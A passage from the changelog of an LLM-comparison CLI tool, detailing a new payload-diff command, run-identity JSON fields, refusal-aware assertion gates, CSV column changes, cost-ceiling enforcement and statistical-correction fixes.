- **A `diff` command: `cli-modelarium diff a.json b.json` reads two payloads you already have and reports what moved.** It writes nothing, stores nothing and watches nothing - `atomic_write_bytes` widens `0600` to `0644` on rewrite, and a second write path would inherit that while holding prompts and model responses. **It is not an action item.** The four numbered items above are things a user must DO on upgrading - rotate a key, expect a pipeline to change colour. This is a capability that did not exist; nothing breaks by ignoring it, and no existing command changes behaviour. **Exit codes: `0` nothing moved, `4` something moved, `2` the pair cannot be compared.** `4` is a new code rather than a reuse, on the argument that earned `EXIT_INTERRUPTED` its own: every other non-zero code means something went wrong, and a diff reporting movement succeeded. Reusing `1` would have a CI job read "something moved" as "an assertion did not pass".
|
|
105
|
+
|
|
106
|
+
**Every shown cell reports whether the ANSWER TEXT changed, before its numbers - and a changed answer counts as movement, which widens "moved" beyond the numeric.** A live run found the gap: `gemini-3.8-flash` returned byte-identical text across two runs while cost moved, and the diff reported only the cost, so a model that returned the SAME answer at a different thinking cost and one that returned a DIFFERENT answer rendered identically. Those are opposite findings. Worse, a different answer at an identical token count moved nothing at all and was dropped by the unchanged-cell filter - a changed answer went unreported because the arithmetic happened to agree. `output_changed` is now `true`/`false`/`null` in JSON and a first row in every console cell group.
|
|
107
|
+
|
|
108
|
+
**Same or not same, never a score.** "94% the same" is a number the payload does not contain, and inventing one is the failure a threshold would be. `null` is the third state, not a fallback: a refused, errored or cancelled row carries an empty output by construction, so comparing two of them would compare two absences and report agreement about a question neither side answered. It does NOT count as movement - an unanswerable question is not a change - but it is still displayed, because "we cannot tell" and "nothing happened" must not render alike. That split is why display now keys on `notable` while the exit code keys on `moved`.
|
|
109
|
+
|
|
110
|
+
**The run-totals line formats like the table above it.** It printed `total_cost_usd: 0.00059625 -> 0.0006187499999999999` two lines under a table rendering the same quantity to six places - faithful, and reading as an arithmetic bug in a tool whose subject is cost. `_fmt_metric` became `_fmt_value` with three callers: the table, the totals line and the p-value line, which had the same raw-float shape. A survey of every console interpolation in `cli.py` found no other raw float outside this command.
|
|
111
|
+
|
|
112
|
+
**The join key is `(prompt, model, temperature, system, run_index, occurrence)`, and the last part is the whole problem.** `(model, temperature, system)` does not identify a row: `_parse_temperatures` and `_resolve_system_prompts` do not de-duplicate (only the model list does, at `_resolve_dynamic_groups`), so `--temperatures 0,0` is two cells carrying one triple and two different costs. `run_index` does not break that tie - they are two cells at ONE run, so both read `0`. `prompt_id` does, but it is a positional ordinal over the whole fan-out, so reordering `--models a,b` to `b,a` shifts every id, which is why `experiment_key` deliberately does not sort the model list. The collision rows differ only positionally, so the key carries exactly that much position: `occurrence` is a row's index among rows already sharing the preceding tuple, counted WITHIN a cell group rather than across the fan-out, so reordering models reorders the groups and leaves each group's internal sequence intact. **Mutation-verified**: forcing `occurrence` to `0` fails two tests, one on the key count and one on the pairing.
|
|
113
|
+
|
|
114
|
+
**Comparability is decided on `invocation`'s components, never on `experiment_key`.** Adding a model changes that hash by design while every overlapping cell stays comparable, so the hash answers a coarser question than the one being asked. A changed prompt or run count refuses (n=1 is a point estimate, n=10 a distribution); an added or removed model proceeds and the one-sided cells are listed separately; a `batch` payload against a `compare` one refuses, which `invocation.command` made possible only as of the previous commit. **A pre-0.2.0 payload is compared, not refused**: it carries no `invocation`, but every row carries `prompt`, `system`, `model` and `temperature` in plain text, so three of the four component lists are recoverable - and `total_runs` was emitted only above one run back then, so its absence is a determinate answer rather than a gap. The two things genuinely lost, `judges` and `command`, are named in the output rather than glossed.
|
|
115
|
+
|
|
116
|
+
**`pricing_as_of` is read from both payloads and flagged before any cost figure.** It is in neither the key's hash material nor `invocation`, so two runs across a pricing update carry the same key, identical components and a different cost on every row - and the READMEs already note that the expiring Gemini and `gpt-5.6-sol` rates "move uniformly, so nothing in the output stands out as odd". It is not hashed: pricing is a property of the tool's rate table rather than an input to the experiment, and hashing it would fork every key on every pricing sweep. It is not moved into `methodology` either, which is compare-only and would lose it on every batch payload.
|
|
117
|
+
|
|
118
|
+
**Argument order sets the direction, and the ordering warning fires only on strict inequality.** Nothing in a payload can order two runs written in the same second - `started_at` is second-precision and `run_id` is a uuid4 carrying no timestamp - and latency cannot substitute, having ordered the original probe's pair backwards. A warning on equal timestamps could not distinguish "contradicts" from "agrees" and would fire on every same-second pair, which is how a warning becomes one users skip.
|
|
119
|
+
|
|
120
|
+
**Four shapes that break a naive diff are handled rather than discovered later.** `cost_usd`, `pass_rate`, `latency_ms` and `ttft_ms` all serialise as `null`, so a null on either side yields no delta rather than an exception - and is reported as unanswerable rather than as zero movement. A zero baseline gives no percentage rather than an infinity, which is the ordinary case for a local model and for `cached_tokens`. Judge reasoning is never reproduced: it is model-generated, differs every run, and is attacker-influenced. And the JSON output carries no `run_id`, `started_at` or `experiment_key` - a diff is not a run, and stamping a partial identity block would raise, by the design of the previous commit.
|
|
121
|
+
|
|
122
|
+
**Significance verdicts are printed from both sides and never subtracted.** A p-value describes one sample, so two from independent runs are both true and their difference is a quantity neither contains. A moved p-value alone does not flip the exit code. There is no threshold anywhere in the command and the word "drift" appears nowhere: a live `gemini-3.8-flash` measurement put 11.7% between two byte-identical outputs, so any fixed band would fire on thinking-token variance alone.
|
|
123
|
+
|
|
124
|
+
**Documented in all nine READMEs under a level-4 heading**, which the parity scanner's `^#{1,3} ` does not see, so the section costs 25 lines per file and zero parity churn. The exit-code table in all nine gains its `4` row.
|
|
125
|
+
|
|
126
|
+
- **A verification column in the supported-providers table, in all nine READMEs, pinned against `PRICING_VERIFICATION`.** The table already carried one non-boolean cell - NVIDIA's "No published rate" under Cost Tracking - so a per-provider caveat is something it already does; this applies the same idea to a second fact. The cells are short on purpose: the column answers "does the date cover my provider", and *why* it does not belongs in `pricing.py` where anyone acting on it is already reading.
|
|
127
|
+
|
|
128
|
+
**The status words are left in English and backticked.** This table translates its PROSE cells - NVIDIA's is "Kein veröffentlichter Tarif" in German - but not its IDENTIFIER cells, and a status drawn from a closed set in the code is an identifier. Backticking says so, keeps the parity assertion a literal string comparison across all nine files instead of nine translation tables inside the test, and matches how the temperature-model list already pins ids. The column HEADER is translated, and carries the meaning.
|
|
129
|
+
|
|
130
|
+
**Proven by mutation, not assertion.** Flipping Groq's cell from `third-party` to `first-party` - exactly the overclaim the column exists to prevent - fails `test_cells_match_the_registry`; deleting a cell from the Japanese table fails two tests; staling NVIDIA's declared count from 9 to 8 fails `test_declared_count_matches_the_registry`.
|
|
131
|
+
|
|
132
|
+
- **`PRICING_VERIFICATION`, so how a rate was established is machine-readable instead of prose.** Until now the answer lived only in comments: `grep UNVERIFIED src/` outside comments returned nothing, so nothing could assert on it, and the nine READMEs stated the same fact with nothing checking they agreed. The constant covers **every** provider - a new one cannot be added without a status, because a blank status reads as verified everywhere downstream.
|
|
133
|
+
|
|
134
|
+
**It is deliberately not a boolean.** "Not first-party verified" covers four materially different situations and flattening them loses the half a reader acts on. `groq` is `third-party` - its rates agree with every source checked, but its CATALOGUE is the open question and a pricing page cannot show that a model moved to sales-led access. `moonshot` is `reseller` - corroborated through Alibaba's listing, which matched, but a reseller is not the vendor. `nvidia` is `unpublished` - there is no per-token rate to verify, so it is unverifi**able** rather than unverifi**ed**, and no future sweep changes that. `openrouter` is `unchecked` - not looked at, which says nothing about the rates either way. `local` is `not-priced`, because "unverified" would be a category error on rows that are $0 by construction.
|
|
135
|
+
|
|
136
|
+
**The coverage figures are derived, not typed.** `pricing_verification_coverage()` reports **68 of 93 priced rows, 73%**, from `PRICING` and the constant together - the four uncovered providers hold 25 rows between them (nvidia 9, openrouter 8, groq 4, moonshot 4). A test proves the derivation is real by re-verifying `openrouter` in a copy and checking the figure moves to 76 on its own, so a hardcoded number cannot hide behind a derived-looking call.
|
|
137
|
+
|
|
138
|
+
- **Two pricing rows: `gpt-6-astra` and `gemini-3.8-flash`.** `gpt-6-astra` at 10.00 / 50.00 / 1.00, verified by live call: reachable on chat-completions, answers, and rejects `temperature=0.5` with a 400 reading "Only the default (1) value is supported" while accepting 1.0. It is the joint second most expensive output rate in the registry, level with `claude-fable-5` and `claude-fable-5-1` and below `o3-pro` at 20.00 / 80.00. `gemini-3.8-flash` at 0.75 / 3.75 / 0.075, on the same introductory schedule as the 3.6 and 3.7 rows - three Gemini rows now double together on 2027-01-01. It is the **first Google row ever flagged** `rejects_sampling_params`; every other Gemini entry still sends a temperature, and that asymmetry is pinned by a test rather than left to be noticed. Two added and two removed leaves the registry at 94 rows; the flagged set goes 17 to 19, and `test_temperature_predicate.py`'s tripwire and its docstring both move with it. Both came out of the 2026-09-06 sweep recorded under Fixed below.
|
|
139
|
+
|
|
140
|
+
- **Four top-level JSON fields that say WHICH run a payload is: `started_at`, `run_id`, `experiment_key` and `invocation`.** They exist because a probe against the published 0.1.9 ran one command twice, 93 seconds apart, and diffed the output. The entire diff was two fields:
|
|
141
|
+
|
|
142
|
+
```
|
|
143
|
+
< "latency_ms": 1327.6398930000114, > "latency_ms": 675.9965260000058,
|
|
144
|
+
< "ttft_ms": 1298.1032870000035, > "ttft_ms": 637.7918160000036,
|
|
145
|
+
```
|
|
146
|
+
|
|
147
|
+
`cost_usd`, every token count and the output string were byte-identical - on the non-thinking model that probe ran. **And the second run was the faster one**, so "higher latency ran earlier" is not even a weak heuristic - it orders that pair backwards. The only remaining signal was filesystem mtime, which does not survive `git add`, a copy, a tar extract or an artifact upload. Every per-model MEASUREMENT a drift monitor would compare was already there; what was missing was run IDENTITY. **That byte-identity does not hold for a thinking model, and this release adds one.** Measured live on `gemini-3.8-flash`, two identical invocations returned the same output string (`Paris` both times) but 65 then 58 output tokens and `$0.00025125` then `$0.000225`; across eight clean runs `output_tokens` spanned 58-66 at a fixed input of 10, because `thoughts_token_count` varies per call. So a drift monitor comparing a thinking model sees cost move between identical runs and must not read that as drift - which is the case *for* `experiment_key` rather than against it: two runs that differ in cost can still be recognised as the same experiment.
|
|
148
|
+
|
|
149
|
+
**`started_at`** is ISO 8601 UTC at second precision with a `Z` suffix, captured as the first statement of `compare()` and `batch()` - before flag resolution, before any provider call. That matters: `_format_json` is entered after the last call returns, so a timestamp taken there is a finish time, and the two moments are minutes apart on `--models all-flagship --runs 10`. Seconds and `Z` rather than microseconds and `+00:00` because jq's `fromdateiso8601` - the first thing a shell monitor reaches for - rejects both of the others. Two runs inside one second are separated by `run_id`, which is the collision it exists to prevent.
|
|
150
|
+
|
|
151
|
+
**`experiment_key`** is a 16-hex-character SHA-256 over the resolved command name, prompts, model list, temperatures, system prompts, judge models and run count. **Its inputs are documented at the constant**, because a hash whose inputs are undocumented is worse than none: a consumer seeing two keys differ cannot tell whether the experiment changed or the hashing did. `EXPERIMENT_KEY_VERSION` is bumped when the inputs change and never for a cosmetic edit. It is needed because `prompt_id` cannot substitute - in `compare` it is a positional row ordinal, so one prompt across two temperatures produces `p1` and `p2`, and a monitor grouping by it would read one experiment as two while colliding `p1` across runs with entirely different prompts.
|
|
152
|
+
|
|
153
|
+
**The model list is deliberately NOT sorted.** Sorting would make `--models a,b` and `--models b,a` share a key, which is defensible on the grounds that the same cells are measured - but `p1` is a different model in each, so a consumer joining two runs on `(experiment_key, prompt_id)` would mis-align every row while both keys agreed. A false "different" costs a monitor one skipped comparison; a false "same" silently corrupts one.
|
|
154
|
+
|
|
155
|
+
**`invocation`** records RESOLVED flags: a run launched with `--models all-flagship` lists the ids that actually ran, because group membership is registry state that moves between releases. `runs` is deliberately absent - `total_runs` is already top-level and unconditional, and a third copy of one number is a third thing that can disagree.
|
|
156
|
+
|
|
157
|
+
**Nothing secret can reach `invocation`, and it is an allowlist rather than a redaction pass.** `--local-url` is excluded because it can carry credentials in the userinfo position (`http://user:pass@host/v1`), and `redact_secrets` covers the `AQ.Ab`, `AIza`, `x-goog-api-key` and `?key=` forms - not a `user:pass` pair. A pattern matcher is the wrong instrument for a value with no pattern. File paths are excluded too, since a path leaks a home directory and a username while the content that matters is already recorded. A test asserts both halves: that `redact_secrets` would indeed miss the canary, and that the allowlist means it never gets the chance.
|
|
158
|
+
|
|
159
|
+
**The suite's byte-identity harness learned about them.** `_mask_measured` in `test_stdout_machine_output.py` now masks `run_id` and `started_at` the way it already masked `ttft_ms`: those tests compare a piped stdout against a written file by running the command twice, so run identity differs there by design. `experiment_key` and `invocation` are left UNMASKED, which is what proves they do not.
|
|
160
|
+
|
|
161
|
+
**Emitted from `batch` as well as `compare`**, unconditionally, on the argument that made `models_without_temperature` unconditional in 0.1.5 - a consumer must read the value rather than infer it from absence, and a conditional `run_id` is a `run_id` nothing can rely on. Markdown gains `Started at` and `Run ID` beside `Pricing data as of`. **CSV is unchanged**: identity is run-level and CSV is row-level, so it would repeat on every row, and 0.2.0 moved that layout once already. **All four are documented in the nine READMEs**, under `Run identity` beside the exit-code table: what each field is, what `experiment_key` hashes, why the run count is in it and the model list is not sorted, and the warning that a shared key does not promise identical results - a thinking model's cost moves between two runs of one experiment.
|
|
162
|
+
|
|
163
|
+
### Changed
|
|
164
|
+
|
|
165
|
+
- **A pipeline that passes today will fail after this release if a model declines a request.** That is the point of the change. A refusing model was laundering its failure through one that answered: `pass_rate` excludes errored assertions from both halves of the ratio, so a refusal removed its own assertions from the denominator, and one definitive assertion anywhere else in the batch was enough to skip the refusal-catching branch for the whole run. Measured on this project's own published files - `examples/ci_eval_suite.json` run with the command from `examples/github_actions_workflow.yml` - `claude-opus-4-7` declining every prompt reported `3 succeeded 0 failed 3 refused assertions 8/8 (100%)` and **exited 0**, while the same model alone with the same refusals exited 1. The suite's first prompt is `"id": "no_refusals"`: the user's own refusal guard, erased by the refusal it exists to catch.
|
|
166
|
+
|
|
167
|
+
**No gate flag caught it.** `--min-pass-rate 1.0` - the strictest the CLI accepts - passed, because the rate genuinely *was* 1.0 over a denominator the refusals had left; `--strict-assertions` reads `totals.failed`, and `count_failed` is `not r.passed and r.error is None`, so a refusal is never a failure. All four configurations now exit 1, and a clean run still exits 0 under every one of them.
|
|
168
|
+
|
|
169
|
+
**`AssertionResult.error` was carrying two causes with opposite intended outcomes, and they are now told apart by `error_kind`.** A missing `jsonschema` errors that assertion identically for *every* model, so it cannot create a differential and no other model's passes can hide it - excluding it from the ratio is the shipped optional-dependency guarantee, and it is untouched. A refusal errors on *one* model and *one* prompt, which is exactly the differential another model's passes absorb. `error_kind` is `"refused"` at the one refusal site and `"environment"` at all thirteen others, so `None` never implicitly means environment.
|
|
170
|
+
|
|
171
|
+
**It is a tag, not a message.** A string match on the refusal text passes every other test - the full suite, all seven optional-dependency tests, the laundered run exiting 1 - and then silently stops firing the first time the message gains per-refusal context. Enriching it with the provider's `stop_category`, the obvious next edit after 0.1.9 put that on four other surfaces, takes the gate back to exit 0 with the whole suite still green. `error` is a display string, rendered to users by `format_assertion_message`; an exit code must not depend on its wording. A test pins this.
|
|
172
|
+
|
|
173
|
+
**The report no longer contradicts the exit code.** With the gate alone, every output file stayed byte-identical - so a report uploaded `if: always()` - as the shipped workflow uploads its JSON - would have attached a red build to a `pass_rate` of `1.0`, and in Markdown to a header reading `- Assertions: 8/8 (100.0% pass rate)` two lines above `- Results: 6 (0 failed, 3 refused)`. The console printed that 100% in green because a refusal is never a `failed`. The count now reaches all three surfaces that show the ratio: the Markdown header gains `, 8 not evaluated (refused)`, the console line gains `+ 8 refused` and turns red, and the JSON gains `total_assertions_refused`. (It was emitted only when non-zero; it is unconditional within the assertions block as of the shape change above.) **The ratio itself is unchanged** - it still describes the requests that were answered, which is what it has always meant; what was missing was a gate on what it does not cover.
|
|
174
|
+
|
|
175
|
+
**Nothing else moves in this change.** No statistic, p-value, confidence interval or cost figure is touched - a seeded three-model, two-temperature, five-run comparison was byte-identical in JSON, CSV, Markdown and console against the tree this landed on. This change adds no CSV column and writes `error_kind` to no output file. **Both moved later in 0.2.0** - the layout entry below appends four columns, and the `error_kind` entry under Fixed sends the tag to JSON - so neither statement describes the released artifact. `compare` has no assertion gate and cannot change exit code from this.
|
|
176
|
+
|
|
177
|
+
**`total_assertions` publishes the definitive count under a name that reads as the whole suite**, so a laundered run reported `total_assertions: 8` when sixteen were configured. It is neither renamed nor redefined: it is the denominator of `pass_rate`, and `total_assertions_passed / total_assertions == pass_rate` holds exactly - redefining it to sixteen would make that `8/16 = 0.5` against a published rate of `1.0`, silently, which is the failure the `pass_rate` note below argues against. A new `total_assertions_configured` carries the true total instead: definitive plus errored, always present, `0`-safe, additive in the same shape as `total_assertions_errored`. The docstring now says which one `total_assertions` is.
|
|
178
|
+
|
|
179
|
+
**The exit-code table in all nine READMEs was wrong** and has a third rule. A refusal-triggered `1` is neither "an assertion did not pass" nor "verified nothing" - the assertion errored, and half the suite was verified - so the row now names it, and the "rules worth knowing before you gate a pipeline" list says a refusal fails the gate whatever the pass rate reads. **The documented `jq` recipe also missed refusals in all nine**: `select(.error)` returns nothing on a declined request, because 0.1.9 deliberately keeps `error` null there so the cost stays in every total. A `select(.error or .refused)` variant is added beside it, verified against a real payload.
|
|
180
|
+
|
|
181
|
+
**Left for the layout group, and done there:** at this point the per-row CSV cells still could not tell a refused row from one with no assertions configured - both rendered `assertions_passed=0, assertions_total=0`, while the Markdown per-row cell correctly showed `⚠ 0/4`. Distinguishing them needs new columns, which is a layout change; the entry below adds `assertions_configured` and `assertions_errored` for exactly this, so **0.2.0 ships the distinction** rather than deferring it. Two more, still unchanged in 0.2.0 and noted so they are not mistaken for oversights: `latency_cv` divides over a sample that includes declines, by the deliberate 0.1.9 rule that a decline is a real billed round trip, and no caveat reaches it; and `all_passed()` counts an errored assertion as passed and an empty list as vacuously true - it has no production caller, and is a candidate for deletion rather than repair.
|
|
182
|
+
|
|
183
|
+
- **The CSV layout gained four columns, `provider`, `status`, `assertions_configured` and `assertions_errored`, appended after `stop_category`.** Three of the changes above each found a CSV gap and left the column for this entry, so the layout moves once rather than three times. **A pipeline reading CSV by column position will need updating; one reading by header name is unaffected.** The first 23 positions are byte-identical to v0.1.9 - `temperature` is still index 4 and `cost_usd` still index 10.
|
|
184
|
+
|
|
185
|
+
**The dynamic tail moved, and appending did not spare it.** `run_index` and the confidence-interval columns are appended to the field list *after* `CSV_COLUMNS`, so growing the tuple pushes them right by four: **`run_index` moves from column 24 to column 28**, and each CI column by the same four - `latency_ms_ci_low` 25 to 29, and so on through `score_ci_high` 32 to 36. A `--runs N` pipeline reading by position is affected even though nothing was inserted. Column counts are now **27** (`--runs 1`), **28** (`--runs N`) and **44** with all four CI metrics.
|
|
186
|
+
|
|
187
|
+
**`provider` is the route the call went through, not the model's vendor.** `openai/gpt-oss-120b` reports `groq`; the same weights on OpenRouter report `openrouter` and are priced 0.15/0.60 against 0.00/0.00. A vendor column would make the price in its own row uninterpretable, and every consumer already treats the value as the route - key lookup, provider construction and the per-provider semaphores all key on it. It is carried on the row from `StreamState.provider_name`, **not** re-derived at format time: `get_provider_for_model` raises `RetiredModelError` on the three retired ids and `UnknownModelError` on anything since dropped from the registry, so a formatter would crash on exactly the rows a historical report is most likely to contain. Not from `CompletionResult.provider` either, which is provider-reported and blank on every error and cancelled row. It is on every row in CSV, JSON and Markdown.
|
|
188
|
+
|
|
189
|
+
**`status` replaces nothing and expresses what CSV could not.** Four values, a closed set: `ok`, `refused`, `error`, `cancelled`. A cancelled row previously differed from a successful one in exactly one cell - an empty `cost_usd` - which is the inference-by-absence this file's JSON side rejects for `refused`. A two-valued column would have labelled the cost ceiling's never-dispatched cells `answered`. It is **not** named `refused`: JSON's per-result `refused` is a boolean and `README.md`'s documented `jq` recipe is `select(.error or .refused)`, where every non-empty string is truthy. Branch on `status`, never on `stop_category`, which stays the provider's own open set.
|
|
190
|
+
|
|
191
|
+
**A refused row's assertion cells were byte-identical to a row with no assertions** - `0, 0, ""` - so a pipeline summing them reported a clean 100% and the refusal disappeared. `assertions_configured` and `assertions_errored` carry it instead. **`assertions_total` is deliberately not widened**: it is the denominator of `pass_rate`, and redefining it would break `assertions_passed / assertions_total` for anyone checking it.
|
|
192
|
+
|
|
193
|
+
**Confidence intervals now say what they rest on.** `_flatten_cell_cis` carries eight fields per interval and CSV wrote two of them, so every row of a truncated run carried the same bounds with nothing recording that they came from the five cells that ran. Each metric gains `<metric>_ci_n`, and the run gains a shared `ci_method`, `ci_level`, `ci_resamples`, `ci_seed`. These land after the `_ci_low`/`_ci_high` pairs, so a consumer slicing "the last N columns" is affected.
|
|
194
|
+
|
|
195
|
+
**The header row is the contract.** Column position is not, and no version column was added: a name-based reader does not need one and a positional reader cannot find it, because its index moves. The suite now pins that contract properly - `assert len(CSV_COLUMNS) == 23` ran before the one real ordering check and shadowed it, so the only assertion that could catch an insert never reported. A prefix assertion against a frozen `V019_COLUMNS` replaces both, and the golden data row is built from the column list rather than retyped.
|
|
196
|
+
|
|
197
|
+
- **A run stopped by the cost ceiling now exits `3` and keeps its output, instead of exiting `2` and throwing the results away.** Enforcement raised `CostLimitExceededError` from inside the run, before anything was written. The user was billed for every cell that completed and then got nothing to show for it - no file, no table, and an exit code that a CI job reads as "the author typed something wrong". Both commands now publish the partial run first and report the ceiling after.
|
|
198
|
+
|
|
199
|
+
**The exit code is `3` because `2` already means the opposite.** Every pre-flight route to `2` - a usage error, a missing key, an unknown model, the estimate's refusal - has run nothing and spent nothing, and the remedy is to fix the command and rerun it. A cost abort has spent money, has real data on disk, and the remedy is to accept the partial results or raise the ceiling. Folding the two together would tell a caller to retry a command that was never wrong.
|
|
200
|
+
|
|
201
|
+
**Publishing a truncated run is only honest because the truncation is visible in it.** A cancelled cell is excluded from every statistic and skipped by the assertions, so the file reports what was measured rather than averaging in cells that never ran, and the ceiling message names how many calls were never started. In `batch` the check sits ahead of the assertion gates for the same reason: a pass rate computed over a population the ceiling cut short is not a verdict about the suite, and it must not be allowed to exit `1` or `0` as though it were.
|
|
202
|
+
|
|
203
|
+
**`CostLimitExceededError` is now unraised by the CLI, deliberately**, and its docstring says so. Publishing before exiting leaves nothing for an exception to do - the command has only to report and quit - and raising one from inside the run is what discarded the artifact in the first place. The class stays for the library boundary, where a caller driving the comparison with its own ledger still needs a typed condition.
|
|
204
|
+
|
|
205
|
+
Measured on the documented `--models all --max-cost 0.50` example: 6 of 32 calls run, the table and the `$0.540000` total written, then the ceiling reported and exit `3`. Under the ceiling the same command still runs all 32 and exits `0`. The under-ceiling path is byte-identical to before this change in CSV and Markdown with the bootstrap seed pinned; JSON gains one additive key per row, `"cancelled": false`.
|
|
206
|
+
|
|
207
|
+
- **`--max-cost` now stops a run that overruns it, instead of only guessing beforehand.** The ceiling was one pre-flight estimate at a flat 500 input / 500 output tokens per call, evaluated once and never consulted again: a run estimated at **$0.009 against a $0.010 cap actually spent $0.924 and exited 0**. A shared ledger now accumulates each cell's real, measured cost and stops dispatching once the ceiling is passed. Measured on a ten-call run at $0.05 a call under a $0.20 ceiling: **ten calls became five**.
|
|
208
|
+
|
|
209
|
+
**THE CAP STOPS FURTHER DISPATCH. IT DOES NOT PREVENT SPEND**, and every part of the design follows from that. A request already sent to a provider cannot be recalled, and abandoning it mid-stream does not help: usage is read inside the provider's chunk loop, so a cancelled call never yields its cost and would report **$0.00 for work that really happened**, making the run's total smaller than the bill. So a dispatched cell is always finished and only un-started cells are skipped. The message says exactly this rather than claiming the ceiling prevented anything.
|
|
210
|
+
|
|
211
|
+
**The overshoot is bounded, measured, and stated.** At most `concurrency - 1` cells beyond the ceiling PER PROVIDER, plus one from the boundary operator. The semaphores are built one per provider (`{name: asyncio.Semaphore(concurrency) for name in provider_names}`) and the ledger check sits inside them, so the bound scales with the number of providers in the run: **one extra cell serially, five on a single provider at the default concurrency of 5, and about fifteen on a three-provider sweep at the same setting**. An earlier version of this sentence gave the single-provider figure as the whole bound, which understated a cost-safety guarantee threefold on a multi-provider run. `exhausted` uses `>` rather than `>=`, matching the pre-flight's `estimated > max_cost` - the same flag must not change operator between the estimate and the run, and `>=` would make `--max-cost 0` exhausted before the first call, so none of the 17 zero-cost registry rows could run.
|
|
212
|
+
|
|
213
|
+
**Judge spend counts toward the same ceiling, and that is a behaviour change.** The pre-flight estimate explicitly excluded it, so **an existing `--max-cost` may begin refusing judged runs it used to allow.** Judging is a second gather with its own per-provider semaphores, and its cost lands on `JudgeScore` rather than on a `StreamState`, so a ledger kept on the state would count none of it. Measured: four model calls at $0.02 stayed under a $0.15 ceiling while four judge calls at $0.06 took the run to $0.32 at exit 0; the judge phase now stops after two and the run ends at $0.20.
|
|
214
|
+
|
|
215
|
+
**No lock.** Single-threaded asyncio makes `+=` atomic because no await sits inside the statement - measured at 20 tasks x 10,000 increments with an explicit yield between each, zero updates lost. A lock here would be cargo, and a test asserts there isn't one.
|
|
216
|
+
|
|
217
|
+
Skipped calls are counted by the ledger rather than by inspecting states, because a skipped judge call has no `StreamState` - counting states alone reported "0 calls were never started" on a run whose judge phase was cut short.
|
|
218
|
+
|
|
219
|
+
- **A pair no test could run on was spending the multiple-comparison budget, and every published p-value paid for it.** `n_comparisons` was `len(pairs)` - every pair formed - and a pair that produced no statistic still appended a placeholder `1.0` to the vector both corrections consume, inflating Bonferroni's multiplier and occupying a rank slot in Holm's step-down. Measured on three models where one answered too few times to test: a difference at `p=0.036168` was published as `0.108504` and reported **not significant**; it is now `0.036168` and **significant**, under both corrections. **Every testable pair's corrected p-value changes whenever any pair is untestable**, and one under-powered model makes `(n-1)` pairs untestable, so the case is not rare. A verdict can flip from not-significant to significant; for finite p-values the reverse cannot happen, which is proven over 700,000 corrected-value comparisons.
|
|
220
|
+
|
|
221
|
+
**The vector is filtered rather than a divisor redefined.** `holm_correct` takes no divisor at all - it reads `len(p_values)` internally - so redefining one never reaches it. Filtering also makes `bonferroni_correct(non_empty, 0)`, which returns all zeros and reads as *every* pair significant, structurally unreachable: the count and the vector come from the same list, so the count is zero only when the vector is empty and the empty guard fires first. The corrected values are remapped by original index; leaving the strict `zip` in place instead raises a `ValueError` that `cli.py` catches, which would drop the **entire significance block** from a saved report at exit 0.
|
|
222
|
+
|
|
223
|
+
**The predicate is the fix, and "untestable" names three states.** `insufficient_samples` and `zero_variance` produce no p-value and leave the budget. `trivial` - two constant, equal samples - produces a **real** `p=1.0`: those samples genuinely do not differ, so it is a tested hypothesis and it stays. Filtering on a `test_used` allowlist or on the raw value being `1.0` evicts it and shrinks the budget on a run where nothing was untestable at all. `zero_variance` (constant samples, *different* means) is deliberately out: the difference is certain in the sample and the test is still undefined, so there is no p-value to correct and no reason for other pairs to pay for an inference nobody drew. The reasoning is recorded at the predicate.
|
|
224
|
+
|
|
225
|
+
**`math.isfinite` is part of the predicate, and it fixes a live defect.** `paired_t_test` on identical aligned samples returns `NaN`, reachable today with `--significance-test paired-t` on two models scoring identically. `sorted()` cannot order a `NaN`, so its rank in Holm's step-down is an artifact of list length - which let a filtered vector reverse-flip a real verdict from significant to null, the one direction that hurts someone who already published. Worse, **Holm published the `NaN` pair itself as significant**: `holm_correct([0.001, nan, 0.04])` returned `[0.003, 0.003, 0.04]`. It now publishes no corrected value and no verdict.
|
|
226
|
+
|
|
227
|
+
**`n_pairs_untestable` is added to `SignificanceResult` and to the JSON when non-zero, and the console says how much of the budget was spent** - its own line, because a per-pair column has nowhere to live (the display is a matrix at 3-5 models, a text line at 2, a top-K list at 6+) and folding it into the refusal caveat would hide it exactly when no arm declined. `n_comparisons` keeps its name and changes meaning from *pairs formed* to *pairs tested*; its field comment said "Total pairwise comparisons" and was corrected. **A note for anyone checking `p_corrected == min(1, p_raw * n_comparisons)`: that identity holds under Bonferroni and was already false under Holm before this change** - measured 6 of 6 rows against 1 of 6 - because Holm's adjustment is `p_sorted[i] * (n - rank)`, not `p * n`.
|
|
228
|
+
|
|
229
|
+
A two-model run is byte-identical in JSON and CSV; when its single pair is untestable the only change is `n_comparisons` going `1` to `0` beside the new key, and no p-value moves because there was none. No other statistic, confidence interval or cost figure is touched.
|
|
230
|
+
|
|
231
|
+
- **A confidence interval computed over one sample was published beside a different one.** `compute_stats_with_cis` grouped by model while the per-cell record groups by `(model, temperature, system prompt)`, so one pooled interval was stamped onto every one of that model's cells. Measured on a two-temperature, one-model, five-run comparison, the cells' latency means were 204.0 ms and 1204.0 ms and both carried the same published 95% interval, `[403.6, 1004.2]` - **containing neither mean it labelled.** Its width was the gap between the cells, which is the quantity a reader is comparing, not the sampling error in either. Each cell is now bootstrapped from its own runs: `[201.6, 206.4]` and `[1201.6, 1206.4]`, 4.80 ms wide against the pooled 600.60. The rekeying covers all seven sites that produce, carry or render these intervals, the per-row CSV lookup included - keyed by model alone it would have matched nothing and blanked every CI column in the file.
|
|
232
|
+
|
|
233
|
+
**The bootstrap itself is untouched** - same statistic, same methods, same resample count and seed handling. What changed is which sample each interval is computed from and which record it is attached to.
|
|
234
|
+
|
|
235
|
+
**Two intervals go away, and both were measuring the wrong thing.** When a metric does not vary within a cell the per-cell bootstrap is degenerate and reports nothing: at temperature 0 a model that returns the identical answer every run has constant token and cost samples, so those intervals disappear while latency, which still varies, keeps one. This is degeneracy, not sample size - it is identical at `--runs 3`, `5` and `10`. The same applies to the score interval under mode-only judging, where one verdict is broadcast across a cell: pooled across two cells that gave n=2 and an interval of `[7.00, 8.00]` built from the two cells' single verdicts; per cell it is one observation and the bootstrap correctly declines.
|
|
236
|
+
|
|
237
|
+
**A single-cell run is byte-identical**, JSON and CSV, on a seeded comparison against the tree this landed on - one cell means per-cell and per-model are the same grouping. **This change adds, removes and renames no CSV column**; the four columns 0.2.0 appends come from the layout entry above, not from here.
|
|
238
|
+
|
|
239
|
+
